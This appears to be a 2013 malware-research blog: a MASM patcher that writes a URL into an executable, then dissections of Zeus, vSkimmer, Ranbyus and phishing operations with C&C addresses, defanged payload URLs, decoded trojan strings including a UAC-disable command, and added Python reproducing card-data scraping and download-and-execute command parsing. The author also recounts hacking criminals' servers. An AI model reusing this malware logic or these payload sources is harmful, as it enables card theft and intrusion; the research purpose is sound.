OpenError    db "* File Already open, close the file and retry.",0
;--------------------------------------------------------------------------------------------------------------
; GetOpenFileName filter: description, pattern, terminating double null
FileFilter   db "Target executable",0,TargetName2,0
;--------------------------------------------------------------------------------------------------------------

.data?
hInstance       HINSTANCE   ?
hTarget         HINSTANCE   ?
hTargetMap      HINSTANCE   ?
ofn             OPENFILENAME    <>
RBuffer         db      64 dup(?)   ; 64 bytes read back from the patch zone (a single dword was too small for ReadFile)
BytesRead       dd      ?           ; ReadFile/WriteFile store a DWORD here, so dd and not db
BytesWritten    dd      ?
pMapView        dd      ?
FileSize        dd      ?
SearchOffset    dd      ?

hMapping        dd      ?
pMapping        dd      ?
TargetN         db      512 dup(?)
inBytes         db      512 dup(?)

alen            dd ?

.const
IDD_CRACKME     equ 101
IDC_PATCH       equ 2001
IDC_EXIT        equ 2002
IDC_ABOUT       equ 2003
icon            equ 2000
IDC_TARGET      equ 2006
IDC_LISTBOX     equ 1002
IDC_BYTES       equ 2012

.code
xstart:
    invoke GetModuleHandle, NULL
    mov    hInstance,eax
    invoke InitCommonControls
    invoke DialogBoxParam, hInstance, IDD_CRACKME, NULL, addr DlgProc, NULL
    invoke ExitProcess,eax

align dword
DlgProc proc hWnd:DWORD,uMsg:DWORD,wParam:DWORD,lParam:DWORD
    ;-------- Load Cursor ---------
    invoke LoadCursor,hInstance,300
    invoke SetCursor,eax
    ;------------------------------
    .if uMsg == WM_INITDIALOG
        invoke LoadIcon,hInstance,icon
        invoke SendMessage,hWnd,WM_SETICON,ICON_SMALL,eax
        invoke GetDlgItem,hWnd,IDC_BYTES
        invoke SendMessage,eax,EM_SETLIMITTEXT,64,0     ; the URL field holds at most 64 chars
        invoke SetWindowText,hWnd,addr ProgId
        invoke SetDlgItemText,hWnd,IDC_TARGET,addr NameofTarget
        invoke List,hWnd,addr StartNfo
        invoke List,hWnd,addr StartNfo2
        invoke List,hWnd,addr StartNfo3
        invoke SetFocus,eax
    .elseif uMsg == WM_COMMAND
        mov eax,wParam
        .if eax == IDC_PATCH
            invoke GetDlgItemText,hWnd,IDC_BYTES,addr WBuffer,sizeof WBuffer
            .if eax == 0 || eax > 64
                invoke List,hWnd,chr$("URL field is either empty or has more than 64 chars!")
                ret
            .endif
            mov ofn.lStructSize,SIZEOF ofn
            mov ofn.lpstrFilter,offset FileFilter
            mov ofn.lpstrFile,offset TargetN
            mov ofn.nMaxFile,512
            mov ofn.Flags,OFN_FILEMUSTEXIST+OFN_PATHMUSTEXIST+\
                          OFN_LONGNAMES+OFN_EXPLORER+OFN_HIDEREADONLY
            invoke GetOpenFileName,addr ofn
            .if eax == TRUE
                ; work on a copy, the original stays untouched
                invoke CopyFile,addr TargetN,addr SecondN,TRUE
                invoke Patch,hWnd
            .endif
        .elseif eax == IDC_EXIT
            invoke SendMessage,hWnd,WM_CLOSE,0,0
        .elseif eax == IDC_ABOUT
            invoke MessageBox,hWnd,chr$("** RED CREW 2013"),chr$("About"),MB_ICONINFORMATION
        .endif
    .endif
    .if uMsg == WM_RBUTTONDOWN
        invoke ShowWindow,hWnd,SW_MINIMIZE
    .endif
    .if uMsg == WM_CLOSE
        invoke EndDialog,hWnd,0
    .endif

    xor eax,eax
    ret
DlgProc endp

List proc hWnd:HWND, pMsg:DWORD
    invoke SendDlgItemMessage,hWnd,IDC_LISTBOX,LB_ADDSTRING,0,pMsg
    invoke SendDlgItemMessage,hWnd,IDC_LISTBOX,WM_VSCROLL,SB_BOTTOM,0
    ret
List endp

Patch proc hWnd:HWND
    invoke GetFileAttributes,addr SecondN
    .if eax != FILE_ATTRIBUTE_NORMAL
        invoke SetFileAttributes,addr SecondN,FILE_ATTRIBUTE_NORMAL
    .endif
    invoke CreateFile,addr SecondN,\
                      GENERIC_READ+GENERIC_WRITE,\
                      FILE_SHARE_READ+FILE_SHARE_WRITE,\
                      NULL,\
                      OPEN_EXISTING,\
                      FILE_ATTRIBUTE_NORMAL,\
                      NULL
    .if eax != INVALID_HANDLE_VALUE
        mov hTarget,eax
        invoke List,hWnd,addr Searching
        ; read the 64 bytes at the patch zone and check they are still null
        invoke SetFilePointer,hTarget,PatchOffset,NULL,FILE_BEGIN
        invoke ReadFile,hTarget,addr RBuffer,64,addr BytesRead,NULL
        .if BytesRead == 64
            mov eax,dword ptr [RBuffer]
            .if eax == dword ptr [Sequence]
                ; zone untouched: overwrite it with the URL, null padded to 64 bytes
                invoke SetFilePointer,hTarget,PatchOffset,NULL,FILE_BEGIN
                invoke WriteFile,hTarget,addr WBuffer,64,addr BytesWritten,NULL
                .if BytesWritten == 64
                    invoke List,hWnd,addr Backup
                    invoke List,hWnd,addr Success
                .else
                    invoke List,hWnd,addr WriteError
                .endif
            .elseif eax == dword ptr [WBuffer]
                ; zone already holds our URL, or this is not the expected file version
                invoke List,hWnd,addr Version
                invoke List,hWnd,addr Nothing
            .endif
        .else
            invoke List,hWnd,addr ReadError
        .endif
        invoke CloseHandle,hTarget
    .else
        invoke List,hWnd,addr Searching
        invoke List,hWnd,addr OpenError
        invoke List,hWnd,addr Nothing
    .endif
    ret
Patch endp

end xstart

rsrc.rc:
;This Resource Script was generated by WinAsm Studio.

#define IDC_STATIC2011 2011
#define IDC_BYTES 2012
#define IDC_GROUPBOX2013 2013
#define IDC_GROUPBOX2015 2015
#define IDC_GROUPBOX2016 2016

2000 ICON DISCARDABLE "RED.ico"
124 DISCARDABLE "manifest.xml"
300 CURSOR DISCARDABLE "Crystal Clear arrow.cur"

101 DIALOGEX 0,0,311,136
FONT 8,"MS Sans Serif"
STYLE 0x80c00880
EXSTYLE 0x00000008
BEGIN
    CONTROL "RED CREW",IDC_GROUPBOX2013,"Button",0x50000007,3,3,304,130,0x00000000
    CONTROL "Control",IDC_GROUPBOX2016,"Button",0x50000007,230,65,64,59,0x00000000
    CONTROL "Status",IDC_GROUPBOX2015,"Button",0x50000007,13,65,214,59,0x00000000
    CONTROL "Patch",2001,"Button",0x50010000,240,77,42,13,0x00000000
    CONTROL "About",2003,"Button",0x50010000,240,92,43,13,0x00000000
    CONTROL "Target:",2004,"Static",0x50000001,13,15,23,10,0x00000000
    CONTROL "",2006,"Edit",0x50010881,13,25,281,11,0x00000200
    CONTROL "Exit",2002,"Button",0x50010000,240,108,43,13,0x00000000
    CONTROL "",1002,"ListBox",0x50010140,20,77,201,38,0x00000200
    CONTROL "URL:",IDC_STATIC2011,"Static",0x50000000,13,40,41,10,0x00000000
    CONTROL "",IDC_BYTES,"Edit",0x50010081,13,49,281,11,0x00000200
END

102 DIALOGEX 10,10,206,113
FONT 8,"Tahoma"
STYLE 0x90480800
EXSTYLE 0x00000000
BEGIN
END

manifest.xml:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <assemblyIdentity version="1.9.2.0" processorArchitecture="x86" name="NoName" type="win32"/>
  <description>NoDes</description>
  <dependency>
    <dependentAssembly>
      <assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"/>
    </dependentAssembly>
  </dependency>
</assembly>

The end.
Don't hesitate to show examples of code if you are motivated.
No password on the archive because nothing is infected.

And if you want some fun: InjectMe #1, InjectMe #2

Other tutorials (in French, sorry)
Etude sur l'indétection du Server de Bifrost 1.2d auprés des Antivirus
ShmeitCorp Memento 6: StartClean Patcher

Package download: http://temari.fr/PackageHex.zip



IceIX/Zeus Red/Zeus

Some Zeus C&Cs found in the wild.

Let's start with IceIX:
• dns: 1 ›› ip: 78.131.222.67 - adresse: POWIAT-LANCUT.COM.PL
Login:

Summary statistics:

OS:

Bots:

Scripts:

Search in database:

Search in files:

Jabber notifier:

Information:

Options:

'Zeus red':

Summary statistics:

OS:

Dynamic config (webinjects)

Options:

Black theme, but with a different theme it looks like this.
Red:

Blue:

Green:

Matrix:

I also noticed a Multi Locker on the hijacked server:


4-char root password, not sure if joke or human stupidity.


Fake Cloudflare:



Decoded:


Lame multiple Zeus:
• dns: 1 ›› ip: 5.135.179.88 - adresse: JAVADOWNLOAD.SYTES.NET
• dns: 1 ›› ip: 5.135.179.88 - adresse: CONNECTTOME1.SYTES.NET
• dns: 1 ›› ip: 5.135.179.88 - adresse: TESTPANEL.SYTES.NET

Login:

Summary statistics:

OS:

Scripts:

Summary2:

Summary3:

Jabber:


access.log:
87.177.174.133 - - [09/Jan/2013:15:19:41 +0100] "GET /zpanel/cp.php?m=reports_db HTTP/1.0" 302 - "-" "Mozilla/5.0"
87.177.175.210 - - [10/Jan/2013:05:44:08 +0100] "GET /zpanel/cp.php?m=reports_db HTTP/1.0" 302 - "-" "Mozilla/5.0"
No log file available from 10/Jan/2013:16:13:51 to 13/Jan/2013:03:46:31
87.177.162.192 - - [13/Jan/2013:09:53:42 +0100] "GET /zpanel/cp.php?m=reports_db HTTP/1.0" 302 - "-" "Mozilla/5.0"
87.177.189.240 - - [14/Jan/2013:09:59:07 +0100] "GET /zpanel/cp.php?m=reports_db HTTP/1.0" 302 - "-" "Mozilla/5.0"
87.177.185.200 - - [15/Jan/2013:05:43:01 +0100] "GET /new/cp.php?m=reports_db HTTP/1.0" 302 - "-" "Mozilla/5.0"
87.177.169.81 - - [16/Jan/2013:13:37:18 +0100] "GET /zpanel/cp.php?m=reports_db HTTP/1.0" 302 - "-" "Mozilla/5.0"
87.177.161.20 - - [17/Jan/2013:08:25:56 +0100] "GET /zpanel/cp.php?m=reports_db HTTP/1.0" 302 - "-" "Mozilla/5.0"
87.177.187.177 - - [18/Jan/2013:14:37:36 +0100] "GET /new/cp.php?m=reports_db HTTP/1.0" 302 - "-" "Mozilla/5.0"
87.177.172.7 - - [19/Jan/2013:09:33:44 +0100] "GET /new/cp.php?m=reports_db HTTP/1.0" 302 - "-" "Mozilla/5.0"
87.177.183.21 - - [20/Jan/2013:12:34:49 +0100] "GET /zpanel/cp.php?m=reports_db HTTP/1.0" 302 - "-" "Mozilla/5.0"
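The pattern in the log above (one operator, a different 87.177.x.x address every day, always hitting cp.php?m=reports_db) is the kind of thing worth pulling out automatically when you get hold of a panel's access.log. The following Python is an added example, not code from the original post: it parses lines of this shape and groups the reports-page hits by /16 so a dynamic ISP range shows up as one operator. The sample log is constructed; the three 87.177.x.x lines mirror the excerpt, while the 203.0.113.7 POST line and its gate.php path are made up to show an unrelated request being ignored.

```python
import re
from collections import defaultdict
from ipaddress import ip_network

# Constructed sample in the same Apache combined-log shape as the excerpt above.
# The three 87.177.x.x lines mirror the real ones; the 203.0.113.7 POST line and its
# gate path are made up to show a non-operator request being ignored.
SAMPLE_LOG = """\
87.177.174.133 - - [09/Jan/2013:15:19:41 +0100] "GET /zpanel/cp.php?m=reports_db HTTP/1.0" 302 - "-" "Mozilla/5.0"
87.177.175.210 - - [10/Jan/2013:05:44:08 +0100] "GET /zpanel/cp.php?m=reports_db HTTP/1.0" 302 - "-" "Mozilla/5.0"
87.177.185.200 - - [15/Jan/2013:05:43:01 +0100] "GET /new/cp.php?m=reports_db HTTP/1.0" 302 - "-" "Mozilla/5.0"
203.0.113.7 - - [15/Jan/2013:05:50:12 +0100] "POST /new/gate.php HTTP/1.1" 200 2 "-" "Mozilla/4.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/\d\.\d" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def parse_line(line):
    """One combined-log line -> dict, or None if the line does not fit the format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def panel_operator_hits(log_text, script="cp.php", module="reports_db"):
    """Requests for the panel script with the given module: an operator reading reports."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path, _, query = rec["path"].partition("?")
        if path.endswith("/" + script) and f"m={module}" in query.split("&"):
            hits.append(rec)
    return hits

def group_by_prefix(hits, prefixlen=16):
    """Collapse operator IPs into /prefixlen blocks; a dynamic ISP range becomes one key."""
    groups = defaultdict(set)
    for rec in hits:
        net = ip_network(f"{rec['ip']}/{prefixlen}", strict=False)
        groups[str(net)].add(rec["ip"])
    return {k: sorted(v) for k, v in groups.items()}

if __name__ == "__main__":
    hits = panel_operator_hits(SAMPLE_LOG)
    for net, ips in group_by_prefix(hits).items():
        print(net, len(ips), "distinct operator IPs:", ", ".join(ips))
```

The /16 grouping is a heuristic for dynamic home connections; for a real case you would look up the allocation (whois) rather than assume the block boundary.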



Heavy snow in France.. I'm sick, a little thought for those who have to get up early.

Trojan:Win32/Reveton

[root@heretyghyuiiiojk www]#
What a cool hostname.


Just the basics: landing page for the Italian ransom.

And traces of a German landing page

Code comments and variable names are in English

By looking at the source code of the pages I saw that "shared.php" is used as the panel, with GET requests only

DB content:

Codes:
There is also a feature to erase vouchers.

vSkimmer, Another POS malware

When I viewed this post, the content had already been removed and the member banned.

vSkimmer - Virtual Skimmer

Functions:
- Track 2 grabber
- HTTP Loader (Download & Execute)
- Update bot itself

Working Modes:
- Online: If the internet is reachable, it will try to bypass firewalls and communicate with the control panel.
- Offline: If the internet is not reachable, it waits for a specific pen drive/flash drive to be plugged in and copies logs to it.

Server coded in PHP (can be modified on request to send logs to a remote server, via SMTP, etc.)
Client coded in C++, no dependencies, 66kb, cryptable. (can be customized)


The malware checks for the presence of a debugger:

Gets PC details (OS, computer name, GUID to identify you in the POS botnet, etc.)

Checks if the file is executed from %APPDATA%; if not, it adds registry persistence and a firewall rule, makes a copy and executes the copy:

Detail of the registry persistence:

Firewall rule to allow the malware:

Creates a mutex and a thread, and gets host information:

Checks for processes:

Some are whitelisted: "System", smss.exe, csrss.exe, winlogon.exe, services.exe, lsass.exe, svchost.exe, spoolsv.exe, wscntfy.exe, alg.exe, mscorsvw.exe, ctfmon.exe, explorer.exe:

And when a process is finally found:

Reads the process memory and searches for the pattern:

If nothing is found:

Gets the info, Base64-encodes it and calls the gate via a GET request:

Answer:
• dns: 1 ›› ip: 31.31.196.44 - adresse: WWW.POSTERMINALWORLD.LA

Parses the answer:

The answer is reduced to its first 3 letters and compared with 'dlx' (Download & Execute) and 'upd' (Update); if one of these is found, it means the bad guys have sent us an order.

For example, dlx:

The order is executed and a response is sent to the server:

The part I love with POS malware:

Or just a simple ";1234567891234567=12345678912345678900?" in a txt file, but it's more gangsta to swipe a card.
So the algorithm detects the pattern, and the Track 2 data is encoded to base64

And sent to the panel:

Now for the offline mode, get drives:

The flash drive must be named "KARTOXA007" (Russian slang for dumps)


Create dmpz.log:
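To make the online-mode loop above concrete, here is an added Python model of it (my code, not vSkimmer's): walk a process list, skip the whitelisted names, scan each process's memory for the Track 2 sentinel pattern, base64 the hit for the gate, and dispatch the gate's answer on its first three characters. The process list and memory contents are constructed stand-ins for ReadProcessMemory output; the 4111... number is the usual Visa test PAN and the 1234... string is the post's own example. The Luhn check is something I added to show why the post's test string still matches: the scraper does a raw pattern match and never validates. The gate parameter name 'dump' and the idea that the text after 'dlx'/'upd' is a URL are assumptions; the post shows neither.

```python
import base64
import re

# Track 2 layout as described in the post: ';' start sentinel, 13-19 digit PAN,
# '=' separator, YYMM expiry, 3-digit service code, discretionary data, '?' end sentinel.
TRACK2_RE = re.compile(rb";(\d{13,19})=(\d{4})(\d{3})(\d*)\?")

# Process names the post lists as whitelisted (never scanned).
WHITELIST = {"System", "smss.exe", "csrss.exe", "winlogon.exe", "services.exe",
             "lsass.exe", "svchost.exe", "spoolsv.exe", "wscntfy.exe", "alg.exe",
             "mscorsvw.exe", "ctfmon.exe", "explorer.exe"}

# Constructed stand-in for ReadProcessMemory output: {process name: bytes}.
# 4111... is the usual Visa test PAN; the 1234... string is the post's own example.
SAMPLE_PROCESSES = {
    "explorer.exe": b"\x00;4111111111111111=15121011234567890?\x00",   # whitelisted: skipped
    "pos.exe": (b"\x90\x90;4111111111111111=15121011234567890?\x00"
                b"garbage;1234567891234567=12345678912345678900?\x00"),
    "notepad.exe": b"no card data in here",
}

def scan_buffer(buf):
    """What the scraper does: raw pattern match over memory, no validation at all."""
    return [m.group(0) for m in TRACK2_RE.finditer(buf)]

def scrape_processes(processes):
    """Walk the process list, skip the whitelist, collect Track 2 hits per process."""
    found = {}
    for name, mem in processes.items():
        if name in WHITELIST:
            continue
        tracks = scan_buffer(mem)
        if tracks:
            found[name] = tracks
    return found

def luhn_ok(pan):
    """Added check (mine, not the malware's): filters pattern hits that cannot be real PANs."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0

def pan_of(track):
    return TRACK2_RE.match(track).group(1).decode()

def encode_for_gate(track):
    """Base64 before the GET to the gate, as in the post; the parameter name 'dump' is assumed."""
    return "dump=" + base64.b64encode(track).decode()

def decode_from_gate(query):
    return base64.b64decode(query.partition("=")[2])

def parse_order(answer):
    """Dispatch as described: first 3 characters compared with 'dlx' / 'upd'.
    That the remainder carries a URL is an assumption; the post does not show the format."""
    cmd, arg = answer[:3], answer[3:].strip()
    if cmd == "dlx":
        return ("download_execute", arg)
    if cmd == "upd":
        return ("update", arg)
    return ("noop", "")

if __name__ == "__main__":
    for proc, tracks in scrape_processes(SAMPLE_PROCESSES).items():
        for t in tracks:
            print(proc, t.decode(), "luhn_ok" if luhn_ok(pan_of(t)) else "fails_luhn",
                  encode_for_gate(t))
    print(parse_order("dlxhttp://203.0.113.9/update.exe"))
```

The same regex is what you would drop into a memory-scanning or YARA rule on a POS host to find out whether card data sits in cleartext in process memory at all; if it does, this family of malware needs nothing more than a process handle to take it.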

Now let's have a look at the panel:

POS Terminals:

Dump download:

Commands:

Settings:

Dumped.. :)

Sample:
https://www.virustotal.com/file/bb12fc4943857d8b8df1ea67eecc60a8791257ac3be12ae44634ee559da91bc0/analysis/1358237597/
Unpack:
https://www.virustotal.com/file/4fba64ad3a7e1daf8ca2d65c3f9b03a49083b7af339b995422c01a1a96532ca3/analysis/1358238314/
Thanks Zora for the sample :)

TowPow BulletProof Affiliate


Trojan.Win32/Spy.Ranbyus

Received an email with an interesting exe
https://www.virustotal.com/file/17a3ee51492b9b2ba155f54be61f2c305b090cee8d604d1df616ca3ba881b372/analysis/1359049655/
Thanks creep.
This bot is used by one group of Russian carders and is not for sale; they call it 'triton'.

IDA map file imported into Olly; without IDA I had huge problems understanding the exe:

Injects:

Decoded strings (some, not all):
&pp=1
reg add "
&files=1
nabagent.exe
putty.exe
[MOUSE R %dx%d]
POST
SeShutdownPrivilege
UniStream.exe
cbsmain.exe
HKLM\
jawt.dll
&net=1
disk%u.xml
&scrn=1
&cmd=1
UZ.DB3
GET
iexplore.exe
ThunderRT6FormDC
com.bifit.harver.core.DocumentBrowserFrame
drweb.exe
nabwatcher.exe
WINNT
bc_loader.exe
avfwsvc.exe
[VK_END]
.iBank*
aswupdsv.exe
%s\tmp%xa%04d.$$$
\/servlets\/ibc
bclient.exe
EnableLUA
secring
client7.exe
Western Union® Translink™
Tiny Client-Bank
/bsi.dll
Content-type: multipart/form-data, boundary=%s
Edit
java.exe
sign.key
\\.\PhysicalDrive0
inbank-start-ff.exe
http://([^:/]+):*([^/]*)(.+)
Content-Disposition: form-data; name="data"; filename="1"
clbank.exe
BBClient.exe
WS2_32.DLL
ComSpec
iscc.exe
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
avengine.exe
https:\/\/ibank.alfabank.ru
WebMoney Keeper Classic » Вход  (window title, "Вход" = Login)
a:\keys.dat
https:\/\/ibank.prbb.ru
oncbcli.exe
logs
nortonantibot.exe
ContactNG.exe
BUTTON
wclnt.exe
ashwebsv.exe
mj=%u&mi=%u&pt=%u&b=%u&dc=%u
sgbclient.exe
cbsmain.dll
avmailc.exe
Software\Microsoft\Windows NT\CurrentVersion\
winlogon.exe
webmoney.exe
egui.exe
/c del
--%s--
auth-attr-\d+-param1=.*&auth-attr-\d+-param2=.*
intpro.exe
vshwin32.exe
firefox.exe
mcshield.exe
Password:
nabmonitor.exe
UNIStream®. Аутентификация.  (window title, "Аутентификация" = Authentication)
Software\Microsoft\Windows\CurrentVersion\Policies\System
&file=2
http://e71koapi.org/lc5dx/index.php
rclient.exe
.jks
cfp.exe
translink.exe
http://pulden376-seven3.in/doEst71beG/index.php

Content-Transfer-Encoding: binary
ntvdm.exe
SysDebug32
%s?id=%s&session=%u&v=%u&name=%s
&av=
avp.exe
System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
cmdagent.exe
WINSCARD.DLL
" /v EnableLUA /t REG_DWORD /d 0 /f
bankcl.exe
Software\Microsoft\Windows\CurrentVersion
safari.exe
avconsol.exe
elbank.exe
username=.*&password=.*
pubring=(.*)
javax.swing.JFrame
secring=(.*)
javaw.exe
ISClient.exe
JVM.DLL
bk.exe
http://([^:/]+)/.+
auth-attr-\d+-param1=(.*)&auth-attr-\d+-param2=([^&]*)
ekrn.exe
sched.exe
avgnt.exe
avwebgrd.exe
startclient7.exe
master.key
avsynmgr.exe
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
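Several of the decoded strings are regular expressions, and running them over plausible input shows what the bot pulls out of a session. The following Python is an added example (mine, not Ranbyus code): the five patterns are copied verbatim from the list above; that they are applied to intercepted request URLs and bodies and to a local config file is my reading of the surrounding strings (POST, multipart form-data, .iBank*, /servlets/ibc), not something the post demonstrates. The URL, form bodies and config text are constructed; the host is an RFC 2606 reserved name, while the /servlets/ibc path comes from the string list.

```python
import re

# Patterns copied verbatim from the decoded-string list above. Applying them to
# intercepted URLs/bodies and to a local config file is my assumption.
URL_RE  = re.compile(r"http://([^:/]+):*([^/]*)(.+)")
CRED_RE = re.compile(r"username=.*&password=.*")
AUTH_RE = re.compile(r"auth-attr-\d+-param1=(.*)&auth-attr-\d+-param2=([^&]*)")
PUB_RE  = re.compile(r"pubring=(.*)")
SEC_RE  = re.compile(r"secring=(.*)")

# Constructed inputs. The host is an RFC 2606 name; the /servlets/ibc path comes
# from the string list.
SAMPLE_URL  = "http://ibank.example.invalid:8443/servlets/ibc"
SAMPLE_AUTH = "auth-attr-0-param1=ivanov&auth-attr-0-param2=Pa55w0rd&lang=ru"
SAMPLE_FORM = "username=ivanov&password=hunter2&remember=1"
SAMPLE_CFG  = "pubring=C:\\keys\\pubring.pkr\nsecring=C:\\keys\\secring.skr\n"

def split_url(url):
    """host, port, path via URL_RE. ':*' then '[^/]*' means a missing port yields ''."""
    m = URL_RE.match(url)
    if not m:
        return None
    host, port, path = m.groups()
    return host, (int(port) if port else 80), path

def is_login_post(body):
    """CRED_RE has no capture groups: it only flags a body worth keeping whole."""
    return CRED_RE.search(body) is not None

def grab_auth(body):
    """Pull the two auth-attr values; the first group is greedy, the second stops at '&'."""
    m = AUTH_RE.search(body)
    return m.groups() if m else None

def keyring_paths(cfg):
    """'.' does not cross newlines, so each (.*) stops at the end of its line."""
    pub = PUB_RE.search(cfg)
    sec = SEC_RE.search(cfg)
    return (pub.group(1) if pub else None, sec.group(1) if sec else None)

if __name__ == "__main__":
    print(split_url(SAMPLE_URL))
    print(is_login_post(SAMPLE_FORM), grab_auth(SAMPLE_AUTH), keyring_paths(SAMPLE_CFG))
```

Note the greedy `(.*)` in the auth-attr pattern: with more than one param1/param2 pair in a body it would swallow everything up to the last param2, which is a detail to keep in mind if you reuse these patterns as detection signatures.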

Aleksandr Matrosov knows this threat better than I do; go have a look at his article: http://blog.eset.com/2012/12/19/win32spy-ranbyus-modifying-java-code-in-rbs

Let's go directly to the panel...

Login:

Statistics:

Active bots with smartcard:

Screenshots (SR):

Clicking on a random day:

A screenshot took by the bot:

Filelist (FL):

File (F):

Keys (K):

Bot information:

Orders to send:


Download list:

Some task urls:
hxxp://whispers.ru/upload/term.exe
hxxp://178.18.249.11/cono.exe
hxxp://hoombauls.com/cono.exe
hxxp://deluxe1924.com/cc/d.exe
hxxp://deluxe1924.com/cc/car2.exe
hxxp://hoombauls.com/cono.exe
hxxp://gramma.pro/update.exe
hxxp://girgrozn.narod2.ru/01/CONO.exe
hxxp://deluxe1924.com/cc/picpic.exe
hxxp://gramma.pro/update.exe
hxxp://deluxe1924.com/cc/fun2101.exe
hxxp://www.mobi-sys.ru/en/lox.exe
hxxp://likeme.pro/update.exe
hxxp://ejdovberk.org/MRD.exe
hxxp://www.enmtp.com/admin/lunt30.exe
hxxp://178.18.249.10/exel.exe
hxxp://deluxe1924.com/cc/picpic.exe
hxxp://orlik.pro/update1.exe
hxxp://whispers.ru/upload/MLN1.exe
hxxp://www.enmtp.com/admin/termclean.exe
hxxp://www.enmtp.com/admin/IMRD.exe
Some files can be found here: http://vxvault.siri-urz.net/ViriList.php?IP=209.61.202.242

Hide:

Lookup:

Add:

Banks:

Download:

Comments:

Others:

Search via IP:

Search via ID:

Daemon:

Update:

Settings:

Phish-BankFraud (EDF+CAF)

This time our guys target CAF, and still EDF.
Phishing redirector:
http://www.phishtank.com/phish_detail.php?phish_id=1711740 > 0/33
CAF phishing: http://www.phishtank.com/phish_detail.php?phish_id=1711743
$MooT.="blackdevilops@gmail.com";
$Meknes.="------------------------------\n";

$s4iir="CAF REZULT";
$sii="From:$fr";

mail($MooT,$s4iir,$Meknes,$sii);

EDF: http://www.phishtank.com/phish_detail.php?phish_id=1711741
$zobob.="blackdevilops@gmail.com";
$zobab.="------------------------------\n";

$s4wir="[FR]--->$zabab | $fr";

$sii="From: Particulier Rezult";

And as usual, some PHP mailers and backdoors.


Email replies from users to the phisher, some are gold :)))

Shells and mailer can be found here: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=2410&start=10#p17890
And phishing pages (EDF+CAF) here: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=2431#p17887



Disk Antivirus Professional

According to S!Ri:
Disk Antivirus Professional is a fake anti-spyware tool. It displays fake alert messages, prevents execution of legitimate programs and detects nonexistent infections to scare users.
It is a clone of System Progressive Protection, Live Security Platinum, Smart Fortress 2012, Smart Protection 2012, Personal Shield Pro.



To register (and help removal), enter this serial code: AA39754E-715219CE

Note for reverse engineers ~


Sample: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=75#p17936



64.85.233.8

bl4kj.zapto.org - astound-64-85-233-8.ca.astound.net - 64.85.233.8
http://vxvault.siri-urz.net/ViriList.php?s=0&m=40&IP=64.85.233.8
http://malwaredb.malekal.com/index.php?domaine=64.85.233.8
http://www.phishtank.com/phish_detail.php?phish_id=1718067

Malware lists:
http://pastebin.com/rp9u4Bzd
Also found my 'ransom unlocker' PHP, a SpyEye loader and a folder named 'Xylibot' with some malicious PHP...
I don't know who you are but:


Finally started to use my Raspberry Pi.

Petroleum POS malware ?

Recently aaSSfxxx posted an interesting file on kernelmode

A POS malware loaded via Andromeda, according to him.
I asked him to write something up, so I won't explain how this malware works; have a look here: http://aassfxxx.infos.st/article21/pos-malware-ram-scrapper

But like I told him in the comments... root the fucker!
The bad guys run a Windows server; Track 2 data is sent to it (or whatever else is grabbed, I haven't reversed the exe so I don't know what is actually grabbed)
Have to thank them for the bad configuration that lets you enable xp_cmdshell (LOL)

ASP backdoor... can be downloaded from rootkit.net.cn/code/aspxspy2.rar
VT: 31/46

RDPwned:

Users:

No more IIS please

They even use cracked apps:

  Proto  Local Address          Foreign Address        State
  TCP    93.170.130.109:443     98:43166               ESTABLISHED
  TCP    93.170.130.109:56161   UBUNTU:microsoft-ds    ESTABLISHED
  TCP    93.170.130.109:56360   mail:60586             SYN_SENT
  TCP    127.0.0.1:1433         genuine:54808          ESTABLISHED
  TCP    127.0.0.1:1433         genuine:56348          TIME_WAIT
  TCP    127.0.0.1:54808        genuine:ms-sql-s       ESTABLISHED
  TCP    127.0.0.1:56349        genuine:ms-sql-s       TIME_WAIT
  TCP    127.0.0.1:56350        genuine:ms-sql-s       TIME_WAIT
  TCP    127.0.0.1:56351        genuine:ms-sql-s       TIME_WAIT
  TCP    127.0.0.1:56352        genuine:ms-sql-s       TIME_WAIT
  TCP    127.0.0.1:56353        genuine:ms-sql-s       TIME_WAIT
  TCP    127.0.0.1:56354        genuine:ms-sql-s       TIME_WAIT
  TCP    127.0.0.1:56355        genuine:ms-sql-s       TIME_WAIT
  TCP    127.0.0.1:56356        genuine:ms-sql-s       TIME_WAIT
  TCP    127.0.0.1:56357        genuine:ms-sql-s       TIME_WAIT
  TCP    127.0.0.1:56358        genuine:ms-sql-s       TIME_WAIT

Stuff grabbed:
More than 600 strings inside.

Not related but also fun (cf: @MalwareScene):
INSERT INTO `bots` (`id`, `last_ip`, `last_online`, `new`, `version`, `traffic`, `command`, `regdate`) VALUES
('1', '84.22.122.6', 1299217483, 0, '8.0.0b', 1337, 'demo', '0000-00-00 00:00:00');

inetnum:        84.22.122.0 - 84.22.122.255
netname:        A84-22-122-0
descr:          REPUBLIC CYBERBUNKER INFRASTRUCTURE
role:           Ministery of Telecommunications
address:        One CyberBunker Avenue
address:        CB-31337
address:        CyberBunker-1

And finally... another idiot leaving stuff around, including the latest Citadel panel.
hxtp://monstercvv.cc/Citadel%201.3.5.1.zip